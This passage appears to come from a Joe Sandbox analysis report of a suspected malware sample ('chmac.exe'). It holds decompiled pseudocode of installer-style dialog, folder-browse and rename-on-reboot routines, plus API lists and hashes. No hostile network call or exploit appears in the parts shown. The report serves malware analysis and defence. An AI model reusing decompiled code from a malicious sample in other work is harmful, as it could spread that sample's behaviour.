									if( *_t130 <= _t133) {
										goto L58;
									}
									_t73 = CreateDialogParamA( *0x423ea0,  *_t130 +  *0x423680 & 0x0000ffff, _t125,  *(0x4091c0 +  *(_t130 + 4) * 4), _t130);
									__eflags = _t73 - _t133;
									 *0x423678 = _t73;
									if(_t73 == _t133) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t130 + 0x2c)));
									_push(6);
									E00403E37(_t73);
									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t134 + 0x10);
									ScreenToClient(_t125, _t134 + 0x10);
									SetWindowPos( *0x423678, _t133,  *(_t134 + 0x20),  *(_t134 + 0x20), _t133, _t133, 0x15);
									_push(_t133);
									E00401389( *((intOrPtr*)(_t130 + 0xc)));
									__eflags =  *0x42366c - _t133;
									if( *0x42366c != _t133) {
										goto L61;
									}
									ShowWindow( *0x423678, 8);
									E00403E83(0x405);
									goto L58;
								}
								__eflags =  *0x423f2c - _t133;
								if( *0x423f2c != _t133) {
									goto L61;
								}
								__eflags =  *0x423f20 - _t133;
								if( *0x423f20 != _t133) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x423678);
						 *0x423ea8 = _t133;
						EndDialog(_t125,  *0x41f860);
						goto L58;
					} else {
						__eflags = _t35 - 1;
						if(_t35 != 1) {
							L33:
							__eflags =  *_t130 - _t133;
							if( *_t130 == _t133) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t130 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L33;
						}
						SendMessageA( *0x423678, 0x40f, 0, 1);
						__eflags =  *0x42366c;
						return 0 |  *0x42366c == 0x00000000;
					}
				} else {
					_t125 = _a4;
					_t133 = 0;
					if(_t115 == 0x47) {
						SetWindowPos( *0x420470, _t125, 0, 0, 0, 0, 0x13);
					}
					if(_t115 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x420470,  ~(_a12 - 1) & _t115);
					}
					if(_t115 != 0x40d) {
						__eflags = _t115 - 0x11;
						if(_t115 != 0x11) {
							__eflags = _t115 - 0x111;
							if(_t115 != 0x111) {
								L26:
								return E00403E9E(_t115, _a12, _a16);
							}
							_t132 = _a12 & 0x0000ffff;
							_t126 = GetDlgItem(_t125, _t132);
							__eflags = _t126 - _t133;
							if(_t126 == _t133) {
								L13:
								__eflags = _t132 - 1;
								if(_t132 != 1) {
									__eflags = _t132 - 3;
									if(_t132 != 3) {
										_t127 = 2;
										__eflags = _t132 - _t127;
										if(_t132 != _t127) {
											L25:
											SendMessageA( *0x423678, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x423f2c - _t133;
										if( *0x423f2c == _t133) {
											_t99 = E0040140B(3);
											__eflags = _t99;
											if(_t99 != 0) {
												goto L26;
											}
											 *0x41f860 = 1;
											L21:
											_push(0x78);
											L22:
											E00403E10();
											goto L26;
										}
										E0040140B(_t127);
										 *0x41f860 = _t127;
										goto L21;
									}
									__eflags =  *0x4091bc - _t133; // 0xffffffff
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t132);
								goto L22;
							}
							SendMessageA(_t126, 0xf3, _t133, _t133);
							_t103 = IsWindowEnabled(_t126);
							__eflags = _t103;
							if(_t103 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongA(_t125, _t133, _t133);
						return 1;
					} else {
						DestroyWindow( *0x423678);
						 *0x423678 = _a12;
						L58:
						if( *0x421498 == _t133 &&  *0x423678 != _t133) {
							ShowWindow(_t125, 0xa);
							 *0x421498 = 1;
						}
						L61:
						return 0;
					}
				}
			}

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004039A0
ShowWindow.USER32(?), ref: 004039BD
DestroyWindow.USER32 ref: 004039D1
SetWindowLongA.USER32(?,00000000,00000000), ref: 004039ED
GetDlgItem.USER32 ref: 00403A0E
SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403A22
IsWindowEnabled.USER32(00000000), ref: 00403A29
GetDlgItem.USER32 ref: 00403AD7
GetDlgItem.USER32 ref: 00403AE1
SetClassLongA.USER32(?,000000F2,?,0000001C,000000FF), ref: 00403AFB
SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403B4C
GetDlgItem.USER32 ref: 00403BF2
ShowWindow.USER32(00000000,?), ref: 00403C13
EnableWindow.USER32(?,?), ref: 00403C25
EnableWindow.USER32(?,?), ref: 00403C40
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403C56
EnableMenuItem.USER32 ref: 00403C5D
SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403C75
SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403C88
lstrlenA.KERNEL32(00420498,?,00420498,004236A0), ref: 00403CB1
SetWindowTextA.USER32(?,00420498), ref: 00403CC0
ShowWindow.USER32(?,0000000A), ref: 00403DF4

Memory Dump Source

Source File: 0000000F.00000002.342969714.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.342869266.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343107648.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343203428.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343348948.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343411245.0000000000429000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343451233.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343464735.000000000042E000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343728294.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_chmac.jbxd

Similarity

API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
String ID:
API String ID: 184305955-0
Opcode ID: 71dbbfc470e5b7342f3a842f49b25357194f1f96d8345790fbe5660f06a32eef
Instruction ID: caafd2a66b76c4ae3962cc82e2ded254e31ce9ec1c8840106f3b43a2641cb278
Opcode Fuzzy Hash: 71dbbfc470e5b7342f3a842f49b25357194f1f96d8345790fbe5660f06a32eef
Instruction Fuzzy Hash: 95C1AF71A04204BBDB206F21ED85E2B7E7CEB05706F40453EF641B12E1C779AA429F6E

Uniqueness

Uniqueness Score: -1.00%

Function 00403F7F, Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 204
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00403F7F(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				char _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				intOrPtr _t103;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L11:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x420478 =  *0x420478 + 1;
							}
							L25:
							_t110 = _a16;
							L26:
							return E00403E9E(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
							_t109 =  *((intOrPtr*)(_t110 + 0x18));
							_v12 = _t100;
							_v16 = _t109;
							_v8 = 0x422e40;
							if(_t100 - _t109 < 0x800) {
								SendMessageA(_t52, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorA(0, 0x7f02));
								_t40 =  &_v8; // 0x422e40
								ShellExecuteA(_a4, "open",  *_t40, 0, 0, 1);
								SetCursor(LoadCursorA(0, 0x7f00));
								_t110 = _a16;
							}
						}
						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
							goto L26;
						} else {
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x423ea8, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x423ea8, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x420478 != 0) {
						goto L25;
					} else {
						_t103 =  *0x41fc68; // 0x0
						_t25 = _t103 + 0x14; // 0x14
						_t112 = _t25;
						if(( *_t112 & 0x00000020) == 0) {
							goto L25;
						}
						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E00403E59(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E0040420A();
						goto L11;
					}
				}
				_t98 = _a16;
				_t113 =  *(_t98 + 0x30);
				if(_t113 < 0) {
					_t113 =  *( *0x42367c - 4 + _t113 * 4);
				}
				_push( *((intOrPtr*)(_t98 + 0x34)));
				_t114 = _t113 +  *0x423ed8;
				_push(0x22);
				_a16 =  *_t114;
				_v12 = _v12 & 0x00000000;
				_t115 = _t114 + 1;
				_v16 = _t115;
				_v8 = E00403F4B;
				E00403E37(_a4);
				_push( *((intOrPtr*)(_t98 + 0x38)));
				_push(0x23);
				E00403E37(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E00403E59( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
				_t99 = GetDlgItem(_a4, 0x3e8);
				E00403E6C(_t99);
				SendMessageA(_t99, 0x45b, 1, 0);
				_t86 =  *( *0x423eb0 + 0x68);
				if(_t86 < 0) {
					_t86 = GetSysColor( ~_t86);
				}
				SendMessageA(_t99, 0x443, 0, _t86);
				SendMessageA(_t99, 0x445, 0, 0x4010000);
				 *0x41f45c =  *0x41f45c & 0x00000000;
				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
				SendMessageA(_t99, 0x449, _a16,  &_v16);
				 *0x420478 =  *0x420478 & 0x00000000;
				return 0;
			}

APIs

CheckDlgButton.USER32 ref: 0040400A
GetDlgItem.USER32 ref: 0040401E
SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 0040403C
GetSysColor.USER32(?), ref: 0040404D
SendMessageA.USER32(00000000,00000443,00000000,?), ref: 0040405C
SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 0040406B
lstrlenA.KERNEL32(?), ref: 00404075
SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404083
SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404092
GetDlgItem.USER32 ref: 004040F5
SendMessageA.USER32(00000000), ref: 004040F8
GetDlgItem.USER32 ref: 00404123
SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404163
LoadCursorA.USER32 ref: 00404172
SetCursor.USER32(00000000), ref: 0040417B
ShellExecuteA.SHELL32(0000070B,open,@.B,00000000,00000000,00000001), ref: 0040418E
LoadCursorA.USER32 ref: 0040419B
SetCursor.USER32(00000000), ref: 0040419E
SendMessageA.USER32(00000111,00000001,00000000), ref: 004041CA
SendMessageA.USER32(00000010,00000000,00000000), ref: 004041DE

Strings

open, xrefs: 00404186
@.B, xrefs: 00404183
N, xrefs: 00404111

Memory Dump Source

Source File: 0000000F.00000002.342969714.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.342869266.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343107648.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343203428.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343348948.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343411245.0000000000429000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343451233.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343464735.000000000042E000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343728294.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_chmac.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
String ID: @.B$N$open
API String ID: 3615053054-3815657624
Opcode ID: 086c9584272f405e5d23a234cb3672cb38a546f38c26fc4f0f37582571ec5c76
Instruction ID: c3de460066171d4a99b3db8707b5a70307f179c1ca483427b8a670d92431fbf8
Opcode Fuzzy Hash: 086c9584272f405e5d23a234cb3672cb38a546f38c26fc4f0f37582571ec5c76
Instruction Fuzzy Hash: 4E61C3B1A40209BFEB109F60CC45B6A7B69FB54715F108136FB04BA2D1C7B8A951CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 00401000, Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x423eb0;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, 0x4236a0, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x423ea8;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}

APIs

DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32 ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32 ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectA.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextA.USER32(00000000,004236A0,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 0000000F.00000002.342969714.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.342869266.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343107648.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343203428.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343348948.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343411245.0000000000429000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343451233.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343464735.000000000042E000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343728294.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_chmac.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 1fa3053a276be56ef7da5d68adfba1d9971bfb9fa2beb597bf2db4fb963a824d
Instruction ID: 81477e3a2fde3fb3f26aa953fc06e347994717d76cab2c79682594c458f31f57
Opcode Fuzzy Hash: 1fa3053a276be56ef7da5d68adfba1d9971bfb9fa2beb597bf2db4fb963a824d
Instruction Fuzzy Hash: 8141BC71804249AFCB058FA4CD459BFBFB9FF44314F00802AF551AA1A0C378EA54DFA5

Uniqueness

Uniqueness Score: -1.00%

Function 004057D3, Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 144
filememoryCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E004057D3() {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t15;
				long _t16;
				int _t20;
				void* _t28;
				long _t29;
				intOrPtr* _t37;
				int _t43;
				void* _t44;
				long _t47;
				CHAR* _t49;
				void* _t51;
				void* _t53;
				intOrPtr* _t54;
				void* _t55;
				void* _t56;

				_t15 = E00405DA3(1);
				_t49 =  *(_t55 + 0x18);
				if(_t15 != 0) {
					_t20 =  *_t15( *(_t55 + 0x1c), _t49, 5);
					if(_t20 != 0) {
						L16:
						 *0x423f30 =  *0x423f30 + 1;
						return _t20;
					}
				}
				 *0x422628 = 0x4c554e;
				if(_t49 == 0) {
					L5:
					_t16 = GetShortPathNameA( *(_t55 + 0x1c), 0x4220a0, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						_t43 = wsprintfA(0x421ca0, "%s=%s\r\n", 0x422628, 0x4220a0);
						_t56 = _t55 + 0x10;
						E00405AA7(_t43, 0x400, 0x4220a0, 0x4220a0,  *((intOrPtr*)( *0x423eb0 + 0x128)));
						_t20 = E0040575C(0x4220a0, 0xc0000000, 4);
						_t53 = _t20;
						 *(_t56 + 0x14) = _t53;
						if(_t53 == 0xffffffff) {
							goto L16;
						}
						_t47 = GetFileSize(_t53, 0);
						_t7 = _t43 + 0xa; // 0xa
						_t51 = GlobalAlloc(0x40, _t47 + _t7);
						if(_t51 == 0 || ReadFile(_t53, _t51, _t47, _t56 + 0x18, 0) == 0 || _t47 !=  *(_t56 + 0x18)) {
							L15:
							_t20 = CloseHandle(_t53);
							goto L16;
						} else {
							if(E004056D1(_t51, "[Rename]\r\n") != 0) {
								_t28 = E004056D1(_t26 + 0xa, 0x409348);
								if(_t28 == 0) {
									L13:
									_t29 = _t47;
									L14:
									E0040571D(_t51 + _t29, 0x421ca0, _t43);
									SetFilePointer(_t53, 0, 0, 0);
									WriteFile(_t53, _t51, _t47 + _t43, _t56 + 0x18, 0);
									GlobalFree(_t51);
									goto L15;
								}
								_t37 = _t28 + 1;
								_t44 = _t51 + _t47;
								_t54 = _t37;
								if(_t37 >= _t44) {
									L21:
									_t53 =  *(_t56 + 0x14);
									_t29 = _t37 - _t51;
									goto L14;
								} else {
									goto L20;
								}
								do {
									L20:
									 *((char*)(_t43 + _t54)) =  *_t54;
									_t54 = _t54 + 1;
								} while (_t54 < _t44);
								goto L21;
							}
							E00405A85(_t51 + _t47, "[Rename]\r\n");
							_t47 = _t47 + 0xa;
							goto L13;
						}
					}
				} else {
					CloseHandle(E0040575C(_t49, 0, 1));
					_t16 = GetShortPathNameA(_t49, 0x422628, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						goto L5;
					}
				}
				return _t16;
			}

APIs

Part of subcall function 00405DA3: GetModuleHandleA.KERNEL32(?,?,00000000,00403268,00000008), ref: 00405DB5
Part of subcall function 00405DA3: LoadLibraryA.KERNELBASE(?,?,00000000,00403268,00000008), ref: 00405DC0
Part of subcall function 00405DA3: GetProcAddress.KERNEL32(00000000,?), ref: 00405DD1

CloseHandle.KERNEL32(00000000,?,00000000,00000001,00000001,?,00000000,?,?,00405568,?,00000000,000000F1,?), ref: 00405820
GetShortPathNameA.KERNEL32 ref: 00405829
GetShortPathNameA.KERNEL32 ref: 00405846
wsprintfA.USER32 ref: 00405864
GetFileSize.KERNEL32(00000000,00000000,004220A0,C0000000,00000004,004220A0,?,?,?,00000000,000000F1,?), ref: 0040589F
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 004058AE
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 004058C4
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,00421CA0,00000000,-0000000A,00409348,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040590A
WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 0040591C
GlobalFree.KERNEL32 ref: 00405923
CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 0040592A

Part of subcall function 004056D1: lstrlenA.KERNEL32(00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004056D8
Part of subcall function 004056D1: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405708

Strings

[Rename], xrefs: 004058D4, 004058E6
%s=%s, xrefs: 0040585A
(&B, xrefs: 0040580E

Memory Dump Source

Source File: 0000000F.00000002.342969714.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.342869266.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343107648.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343203428.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343348948.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343411245.0000000000429000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343451233.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343464735.000000000042E000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343728294.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_chmac.jbxd

Similarity

API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeLibraryLoadModulePointerProcReadSizeWritewsprintf
String ID: %s=%s$(&B$[Rename]
API String ID: 3772915668-1834469719
Opcode ID: 59f55a9dc5d97f07b1302869ed359d77eb01a2f99cc6c2b796ec22a8fd90dab3
Instruction ID: f113039d6a8e0b98787bbcb52898fefdd985450d1919188b96c4478b1d7dfea3
Opcode Fuzzy Hash: 59f55a9dc5d97f07b1302869ed359d77eb01a2f99cc6c2b796ec22a8fd90dab3
Instruction Fuzzy Hash: 0F412371A00B11FBD3216B619D48FAB3A5CDB45764F100036FA05F22D2E678A801CEBD

Uniqueness

Uniqueness Score: -1.00%

Function 00404275, Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 266
stringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E00404275(struct HWND__* _a4, signed int _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				struct HWND__* _v12;
				long _v16;
				long _v20;
				char _v24;
				long _v28;
				char _v32;
				intOrPtr _v36;
				long _v40;
				signed int _v44;
				CHAR* _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				CHAR* _v68;
				void _v72;
				char _v76;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t81;
				long _t86;
				signed char* _t88;
				void* _t94;
				signed int _t95;
				signed short _t113;
				signed int _t117;
				char* _t122;
				intOrPtr* _t138;
				signed int* _t145;
				signed int _t148;
				signed int _t153;
				struct HWND__* _t159;
				CHAR* _t162;
				int _t163;

				_t81 =  *0x41fc68; // 0x0
				_v36 = _t81;
				_t162 = ( *(_t81 + 0x3c) << 0xa) + 0x424000;
				_v8 =  *((intOrPtr*)(_t81 + 0x38));
				if(_a8 == 0x40b) {
					E0040532A(0x3fb, _t162);
					E00405CE3(_t162);
				}
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E0040532A(0x3fb, _t162);
							if(E00405659(_t180, _t162) == 0) {
								_v8 = 1;
							}
							E00405A85(0x41f460, _t162);
							_t145 = 0;
							_t86 = E00405DA3(0);
							_v16 = _t86;
							if(_t86 == 0) {
								L31:
								E00405A85(0x41f460, _t162);
								_t88 = E0040560C(0x41f460);
								if(_t88 != _t145) {
									 *_t88 =  *_t88 & 0x00000000;
								}
								if(GetDiskFreeSpaceA(0x41f460,  &_v20,  &_v28,  &_v16,  &_v40) == 0) {
									_t153 = _a8;
									goto L37;
								} else {
									_t163 = 0x400;
									_t153 = MulDiv(_v20 * _v28, _v16, 0x400);
									_v12 = 1;
									goto L38;
								}
							} else {
								if(0 == 0x41f460) {
									L30:
									_t145 = 0;
									goto L31;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t113 = _v16(0x41f460,  &_v44,  &_v24,  &_v32);
									if(_t113 != 0) {
										break;
									}
									if(_t145 != 0) {
										 *_t145 =  *_t145 & _t113;
									}
									_t145 = E004055BF(0x41f460) - 1;
									 *_t145 = 0x5c;
									if(_t145 != 0x41f460) {
										continue;
									} else {
										goto L30;
									}
								}
								_t153 = (_v40 << 0x00000020 | _v44) >> 0xa;
								_v12 = 1;
								_t145 = 0;
								L37:
								_t163 = 0x400;
								L38:
								_t94 = E004046C5(5);
								if(_v12 != _t145 && _t153 < _t94) {
									_v8 = 2;
								}
								if( *((intOrPtr*)( *0x42367c + 0x10)) != _t145) {
									E00404610(0x3ff, 0xfffffffb, _t94);
									if(_v12 == _t145) {
										SetDlgItemTextA(_a4, _t163, 0x41f450);
									} else {
										E00404610(_t163, 0xfffffffc, _t153);
									}
								}
								_t95 = _v8;
								 *0x423f44 = _t95;
								if(_t95 == _t145) {
									_v8 = E0040140B(7);
								}
								if(( *(_v36 + 0x14) & _t163) != 0) {
									_v8 = _t145;
								}
								E00403E59(0 | _v8 == _t145);
								if(_v8 == _t145 &&  *0x420484 == _t145) {
									E0040420A();
								}
								 *0x420484 = _t145;
								goto L53;
							}
						}
						_t180 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t117 = _a12 & 0x0000ffff;
					if(_t117 != 0x3fb) {
						L12:
						if(_t117 == 0x3e9) {
							_t148 = 7;
							memset( &_v72, 0, _t148 << 2);
							_v76 = _a4;
							_v68 = 0x420498;
							_v56 = E004045AA;
							_v52 = _t162;
							_v64 = E00405AA7(0x3fb, 0x420498, _t162, 0x41f868, _v8);
							_t122 =  &_v76;
							_v60 = 0x41;
							__imp__SHBrowseForFolderA(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405578(_t162);
								_t125 =  *((intOrPtr*)( *0x423eb0 + 0x11c));
								if( *((intOrPtr*)( *0x423eb0 + 0x11c)) != 0 && _t162 == "C:\\Users\\hardz\\AppData\\Local\\Temp") {
									E00405AA7(0x3fb, 0x420498, _t162, 0, _t125);
									if(lstrcmpiA(0x422e40, 0x420498) != 0) {
										lstrcatA(_t162, 0x422e40);
									}
								}
								 *0x420484 =  &(( *0x420484)[0]);
								SetDlgItemTextA(_a4, 0x3fb, _t162);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t159 = _a4;
					_v12 = GetDlgItem(_t159, 0x3fb);
					if(E004055E5(_t162) != 0 && E0040560C(_t162) == 0) {
						E00405578(_t162);
					}
					 *0x423678 = _t159;
					SetWindowTextA(_v12, _t162);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00403E37(_t159);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00403E37(_t159);
					E00403E6C(_v12);
					_t138 = E00405DA3(7);
					if(_t138 == 0) {
						L53:
						return E00403E9E(_a8, _a12, _a16);
					}
					 *_t138(_v12, 1);
					goto L8;
				}
			}

APIs

GetDlgItem.USER32 ref: 004042C1
SetWindowTextA.USER32(?,?), ref: 004042EE
SHBrowseForFolderA.SHELL32(?,0041F868,?), ref: 004043A3
CoTaskMemFree.OLE32(00000000), ref: 004043AE
lstrcmpiA.KERNEL32(pzusn,00420498,00000000,?,?), ref: 004043E0
lstrcatA.KERNEL32(?,pzusn), ref: 004043EC
SetDlgItemTextA.USER32 ref: 004043FC

Part of subcall function 0040532A: GetDlgItemTextA.USER32 ref: 0040533D

Part of subcall function 00405CE3: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\AppData\Roaming\dihsw\chmac.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D3B
